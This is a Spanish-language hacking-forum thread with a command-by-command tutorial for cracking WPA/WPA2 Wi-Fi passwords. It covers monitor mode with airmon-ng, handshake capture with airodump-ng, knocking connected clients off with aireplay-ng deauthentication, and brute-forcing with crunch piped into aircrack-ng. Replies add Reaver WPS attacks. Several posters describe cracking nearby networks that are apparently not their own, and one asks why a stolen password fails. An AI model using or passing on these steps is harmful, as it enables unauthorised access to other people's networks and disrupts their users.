Foro de elhacker.net

Bueno este es mi primer "aporte" (en realidad me base en algunos tutoriales que vi y uni segu me parecio mejor), asi que si cometo algun error espero me corrijan.

aqui dejo uno de los tut. que leí

http://www.miralapantalla.com/auditorias-backtrack-5-crackear-claves-wpawpa2-sin-diccionario/

Descifrar wpa-wpa2 sin diccionario con crunch

Yo se que hay muchos que estan aburridos de estar haciendo o descargando diccionarios para hacer el uso de "la fuerza bruta", aunque lo que <<en mi opinion>> eso no es fuerza bruta, si no una cosa de suerte, aqui les digo como hacer el uso de "la fuerza bruta" para descifrar una wpa-wpa2.

primero descargarse el crunch.

http://db.tt/sXflhAeR

después lo instalas (esto lo saque del tuto del link de arriba).

vamos a la carpeta donde se ha descargado y hacemos click derecho y abrir en un terminal. Cuando se abra el terminal teclearemos:

tar -xvzf crunch-3.3.tgz

Entramos en el directorio donde se acaba de descomprimir escribiendo:

cd crunch-3.3

Vamos a la carpeta y abrimos el archivo MakeFile para donde pone (en gedit tecleando $ gedit Makefile):

val:    crunch.c @echo “Building valgrind compatible binary…”
$(CC) $(VCFLAGS) $(LFS) $? -o crunch

Cambiar la última línea por:

 $(CC) $? $(VCFLAGS) $(LFS) -o crunch

Y en donde pone:

crunch: crunch.c
@echo “Building binary…”
$(CC) $(CFLAGS) $(LFS) $? -o $@

Cambiar la última línea por:

$(CC) $? $(CFLAGS) $(LFS) -o $@

Guardamos y nuevamente en el terminal escribiremos:

make install

Para copiarlo en el sbin haciendo así:

cp crunch /usr/sbin/

 hasta ahi va la instalación de crunch....

Ahora viene lo bueno...

si de casualidad no tienes todas las herramientas (aircrack-ng) puedes descargarlas de aquí:

http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz

y aqui les dejo algo de como instalarlo:

http://www.bluegehena.com/2012/12/instalar-aircrack-ng-en-linux-mint-13.html


Volviendo al tema......

vamos a la terminal y corremos airmon-ng (como supongo que algunos ya saben jeje).

tecleamos airmon-ng y activamos modo monitor, en mi caso es:

airmon-ng start wlan0

luego, vamos a analizar las redes:

airodump-ng mon0

ahora se elige la red a crackear:

airodump-ng -w crack (cualquier nombre aqui) -c 6 (canal que utiliza la red) --bssid xx:xx:xx:xx:xx (mac de la red que estamos atacando) mon0 (interfaz utilizada)

Ok, hasta aquí igual al cracking de wep, ahora vamos a conseguir el handshake  ;-) que es un archivo que manda el ordenador con la contraseña al router para que este acepte la conexión. Podemos esperar a que un cliente se conecte, o si no, si hay algún cliente conectado, procederemos a su desautentificación para que se desconecte y al volverse a conectar capturemos su Handshake :

aireplay-ng -0 00 (00 es el numero de veces que queremos que se intente desautentificar, con 50 suele llegar) -a (mac del router) -c (mac del cliente que está conectado, aparece justo debajo de donde pone station) (interface que estamos usando).

aquí talves te pida que pongas el nombre de la red (a mi me paso jeje) asi que solo pones -e [NombreDeLaRed] y algunos otros problemas jeje  :silbar:

ahora al tener el handshake viene lo siguiente:

crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -

8 9 igual el numero de digitos de la pass y 0123456789 los digitos que utilizara para hacer las combinaciones.

aquí llega el ejemplo de la pag. que ví, lo que no dice es que puedes poner por ejemplo:

abcdefghixyz0123456789 y te mezclara las combinaciones con las letras!!
así es posible llegar a cualquier contraseña porque tecleara todas las combinaciones posibles.... el problema es cuando jejeje

aquí es donde se ve la verdadera fuerza bruta.

Porque si no se te ocurre cual contrseña puede ser, solo dejas esto correr hasta que salga, pero eso si, ¡¡tienes que ser paciente!! jajaja

Espero les sirva, la pregunta no es: ¿¿se puede crackear una wpa-wpa2 sin diccionario?? si no : ¿¿Cuanto se tarda?? jajaja muchas gracias, si cometí algun error me dicen por favor ^^'

Excelente  ;D Lo acabo de probar con una red (con una pass facil, eso si, para que no tardara tanto) y funciona perfectamente, conocía la herramienta crunch pero no sabia que podía hacer eso con el aircrack xD

Gracias

jeje ok, de nada, yo en este mismo momento acabo de conseguir una, y se toma su tiempo, pero se llega a la meta, así ya no estas haciendo las listas o bajándotelas  y esperando que en esas listas este el pass, con crunch siento que se te hace más seguro conseguirlo, aunque se tarde jeje,, y este conviene más cuando igual que yo, estas rodeado de WIFIs con wpa-wpa2 jejeje y me agrada que te haya funcionado  ;D saludos.

Mas bien es... ¿cuantas keys por segundo crackeas?... entre mas mas rapido, menos... tiempo. Todo se reduce al poder de tu PC en precesar mas keys.

jeje apenas 1 mega, jajaja pero solo es la tarjeta de la laptop, quiero conseguir un Alfa Network AWUS036NHA pero ahi voy jaja a ver si me puedes recomendar otro mejor jejeje

Es diferente, no es fuerza bruta sino una vulnerabilidad en el sistema de proteccion WPS, ademas no sirve con todos los routers/modems.

 :laugh:

lo eliminaron?   :huh:

Holas.

Saben si el crunch viene instalado e el baktrack o wifislax.
gracias

Creo que si, viene instalado en kali

Estoy en Kali 1.0.4 y si lo tiene (asumo que 1.0.5 que salio hace poquito tambien lo debe tener)

P.D: maniana lo pruebo en la notebook y en la PC de escritorio y a ver si muestran la cantidad de contrasenias que puede probar por seg dependiendo de la maquina.

Imagino que debe ser bueno para hacer una pequenia prueba de una clave con numeros (a veces suelen ser numeros de documentos, telefonos, o fechas)

Estimados,

Buenas tardes, les comento que soy nuevo en este foro y tengo el agrado de comentarle mi punto de vista con respecto a este tema,

1.- Fuerza bruta se puede atacar solo a los router que tienen habilitada la opción PIN, WPS es una autenticación.

2.- Este tipo de fuerza bruta lo trae kali Linux como back-track los cuales son efectivas,  escaneo las redes primero con mi celu y sale la opción habilitada con su WPS, ojo recuerden que no todos lo router tienes esa opción activada,

3.- Tiempo, es mas menos 10 horas este ataque, dejen corriendo en la noche y al otro dia van a cosechar.


La opción de ataque es llamada "Reaver" la cual funciona excelente.


Saludos.

Pues no, la fuerza bruta es solo un modo como atacas ya sea contra un handshake o atacar al wps o intentar varios usuarios y contraseñas de un login de X interfaz... aca c plantea opcion a diccionario o como se habla de este tema a fuerza bruta o sea a saco darle todas las combinaciones posibles dentro de un rango predefinido... asi que no es exclusiva la Fuerza Bruta de wps.

No es necesario usar el celular para ver si tiene el wps activo, hay mas tools like: wash del propio reaver, para usar desde tu adaptador que a leguas le dana a una antena de celular un adaptador decente con conector externo.

Eso es con suerte, a veces te tardara mas incluso meses enteros debido al umbral de bloqueo de intentos hechos o time off que te de el router en cuestion, asi que nada facil, suerte no esto es cuestion de muchos factores....

No es una opcion es un software que te permitira explotar una vulnerabilidad o algunos diran descuido de los admins de redes wifi o compañias de internet y obtener el pin y a veces la clave wpa...
Hombre se nota que eres nuevo pero vamos mas que tus puntos de vista, mejor postea informacion que ayude y no lo mismo que todos ponen y podrian obtener dandole a todo lo que va google... asi no desinformamos y no te desvias del tema que nada que ver.... :rolleyes:

hola te escribo pidiendo ayuda porque la verdad ni yo me creo lo que paso.. desencripte la clave (wpa) de una red FIbertel con crunch pero a la hora de conectarme a la red me dice que la clave es erronea!!
probe sacando de nuevo el handsake y con crunch empece a descifrar de nuevo y me vuelve a dar la misma clave!!!! o sea que según crunch esa es la clave, pero el modem no me deja conectarme       
alguna idea de porque el modem se estara poniendo la gorra?   

venga pero para que te rompes el tarro pensando eso, cambia la clave y asunto arreglado, que la contraseña a de ser 1234 y ponle una dificil por ejemplo: 8fh27fghspbnw04ns1d6r4nv93hgt8eb6ifgwndf83gnbsufn